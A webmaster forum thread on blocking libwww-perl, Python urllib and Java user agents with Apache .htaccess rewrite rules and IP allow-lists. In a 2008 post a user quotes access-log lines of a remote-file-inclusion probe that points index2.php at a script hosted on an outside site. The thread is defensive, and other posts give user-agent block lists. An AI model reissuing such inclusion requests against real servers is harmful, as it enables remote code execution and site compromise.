Forum Moderators: open


libwww-perl/5.53

archive.org


react

2:15 pm on Apr 28, 2003 (gmt 0)

10+ Year Member



209.237.232.83 - - [28/Apr/2003:13:15:55 +0100] "GET /robots.txt HTTP/1.0" 200 484 "-" "libwww-perl/5.53"
209.237.232.81 - - [28/Apr/2003:13:16:01 +0100] "GET /robots.txt HTTP/1.0" 200 484 "-" "libwww-perl/5.53"
209.237.232.84 - - [28/Apr/2003:13:16:05 +0100] "GET /robots.txt HTTP/1.0" 200 484 "-" "libwww-perl/5.53"
209.237.232.80 - - [28/Apr/2003:13:16:06 +0100] "GET /robots.txt HTTP/1.0" 200 484 "-" "libwww-perl/5.53"

I did a tracert and the addresses resolve to archive.org, but I thought they used a different UA? I have also had a lot more requests from these IPs!

jdMorgan

2:55 pm on Apr 28, 2003 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



react,

As I recall, IA uses libwww to check whether they're allowed to display your graphics. So they're probably grabbing your robots.txt to see whether you've Disallowed your graphics or the subdirectories your graphics reside in.
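If that is what's happening, you can control it from robots.txt; a minimal sketch (the path is a placeholder; ia_archiver is the Wayback Machine's robots token):

```
User-agent: ia_archiver
Disallow: /images/
```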

I generally block libwww-perl accesses, but I allow AltaVista, Inktomi, and IA Archiver to use it to access my sites because they use it legitimately.

Similarly, I block Java and Python URLlib, but allow Google to use them because several of the Google Labs tools use those User-agents.

My main concern is e-mail scrapers and site downloaders, just due to the wasted bandwidth, but I have no problem with legitimate users of these sometimes-too-powerful utilities.


# Block libwww-perl except from AltaVista, Inktomi, and IA Archiver
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/[0-9] [NC]
RewriteCond %{REMOTE_ADDR} !^209\.73\.(1[6-8][0-9]|19[01])\.
RewriteCond %{REMOTE_ADDR} !^209\.131\.(3[2-9]|[45][0-9]|6[0-3])\.
RewriteCond %{REMOTE_ADDR} !^209\.237\.23[2-5]\.
RewriteRule !^403.*\.html$ - [F]
#
# Block Java and Python URLlib except from Google
RewriteCond %{HTTP_USER_AGENT} ^(Python.urllib|Java/?[1-9]\.[0-9]) [NC]
RewriteCond %{REMOTE_ADDR} !^216\.239\.(3[2-9]|[45][0-9]|6[0-3])\.
RewriteRule !^403.*\.html$ - [F]

Note that any User-agent is allowed to access my custom 403 pages - it's only fair... :)
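Those REMOTE_ADDR patterns are ordinary regular expressions, so they can be sanity-checked outside Apache before deploying. A quick sketch in Python (the first sample IP is from the log excerpt above, the second is an arbitrary outside address):

```python
import re

# Allow-list patterns from the RewriteCond lines above.
ALLOW = [
    r"^209\.73\.(1[6-8][0-9]|19[01])\.",        # AltaVista
    r"^209\.131\.(3[2-9]|[45][0-9]|6[0-3])\.",  # Inktomi
    r"^209\.237\.23[2-5]\.",                    # IA Archiver
]

def allowed(ip: str) -> bool:
    """True if the address falls inside one of the allow-listed ranges."""
    return any(re.match(p, ip) for p in ALLOW)

print(allowed("209.237.232.83"))  # archive.org crawler from the log: True
print(allowed("66.249.66.1"))     # outside the ranges: False
```
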

HTH,
Jim

react

3:21 pm on Apr 28, 2003 (gmt 0)

10+ Year Member



Thanks very much Jim, you have put my mind at rest :)

cyberdyne

12:00 pm on Mar 15, 2008 (gmt 0)

10+ Year Member



Hope nobody minds me opening up an old thread, but I need a little advice on libwww-perl if possible please.

I found these two entries in my logs which, I think, indicate successful libwww-perl requests.

copper.webfusion.co.uk - - [15/Mar/2008:03:38:35 +0000] "GET //index2.php=http://www.pressurekru.co.uk/images/profile/jpg.txt? HTTP/1.1" 200 666 "-" "libwww-perl/5.68"
dublin.clusterspan.net - - [15/Mar/2008:03:41:03 +0000] "GET //index2.php=http://www.pressurekru.co.uk/images/profile/jpg.txt? HTTP/1.1" 200 665 "-" "libwww-perl/5.805"

Am I correct in assuming the above two hits were not blocked despite having the following lines in my .htaccess file?

RewriteEngine On
#
#
RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(python[-.]?urllib|java/?[1-9]\.[0-9]) [NC]
#
#
RewriteRule ^.*$ 403.php [L]

Thank you for any advice.

cyberdyne

12:17 pm on Mar 15, 2008 (gmt 0)

10+ Year Member



I have just rewritten my rules to include the code from the top of this page, I am sure some of it is unnecessary but would appreciate any comments.

Thank you.

# Block libwww-perl except from AltaVista, Inktomi, and IA Archiver
#
RewriteEngine On
#.....
RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/[0-9] [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(Python.urllib|Java/?[1-9]\.[0-9]) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(python[-.]?urllib|java/?[1-9]\.[0-9]) [NC]
RewriteCond %{REMOTE_ADDR} !^207\.126\.2(2[4-9]|3[0-9])\.
RewriteCond %{REMOTE_ADDR} !^209\.73\.(1[6-8][0-9]|19[01])\.
RewriteCond %{REMOTE_ADDR} !^209\.131\.(3[2-9]|[45][0-9]|6[0-3])\.
RewriteCond %{REMOTE_ADDR} !^209\.237\.23[2-5]\.
RewriteCond %{REMOTE_ADDR} !^216\.239\.(3[2-9]|[45][0-9]|6[0-3])\.
#....
RewriteRule !^403.*\.php$ - [F]

wilderness

7:42 pm on Mar 15, 2008 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Am I correct in assuming the above two hits were not blocked despite having the following lines in my .htaccess file?

Best practice is to check your error logs.

Those requests resulted in a 200, but what is the file size of 403.php when somebody accesses that file?
Compare it to the 200 response sizes in those log lines, because you are, after all, rewriting to that page.

RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC,OR]

In addition, for the above to function,
you should either escape the hyphen or enclose the entire phrase (hyphen included) in quotes.
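On the status-code point: an internal rewrite to 403.php serves that page with a 200 status unless the script itself emits a 403 header, which is why the logs show 200s. Returning a genuine Forbidden status only needs the [F] flag; a minimal sketch using one of the conditions already in the ruleset:

```apache
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC]
RewriteRule .* - [F]
```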

Don

wilderness

7:48 pm on Mar 15, 2008 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/[0-9] [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(Python.urllib|Java/?[1-9]\.[0-9]) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(python[-.]?urllib|java/?[1-9]\.[0-9]) [NC]

You may solve all this with a single line:

RewriteCond %{HTTP_USER_AGENT} (libwww|perl|Indy|python|urllib|java) [NC]
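Note that an unquoted RewriteCond pattern is an unanchored search, so that single line matches any User-agent merely containing one of those words. A quick sketch of the equivalent match in Python:

```python
import re

# Unanchored, case-insensitive search, mirroring the single RewriteCond above.
BAD = re.compile(r"libwww|perl|Indy|python|urllib|java", re.IGNORECASE)

for ua in (
    "libwww-perl/5.805",
    "Java/1.6.0_03",
    "Mozilla/5.0 (Windows NT 5.1)",  # ordinary browser: not matched
):
    print(ua, "->", "blocked" if BAD.search(ua) else "allowed")
```
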

Don

cyberdyne

3:59 pm on Mar 16, 2008 (gmt 0)

10+ Year Member



Excellent, I'll try that, thank you very much wilderness.

incrediBILL

1:01 am on Mar 17, 2008 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



FWIW, I always block libwww-perl no matter who's using it because anyone serious about using a Perl script can identify themselves with one lousy line of code:

$ua->agent("My User Agent");

If they aren't serious enough to add that line why should I take them seriously? ;)
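The same one-line fix exists for the other default agents discussed earlier; in Python's urllib, for example (URL and bot name here are placeholders):

```python
import urllib.request

# Without this header the request goes out as "Python-urllib/x.y" and
# trips the blocks above; identifying yourself takes one line.
req = urllib.request.Request(
    "http://www.example.com/robots.txt",  # placeholder URL
    headers={"User-Agent": "MyBot/1.0 (+http://www.example.com/bot.html)"},
)
print(req.get_header("User-agent"))
```
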

FYI, lazy botnet probes use the default user agent so blocking libwww-perl is a matter of basic site protection.
[webmasterworld.com...]


keyplyr

7:32 am on Mar 17, 2008 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



I agree 100% with Bill's assessment.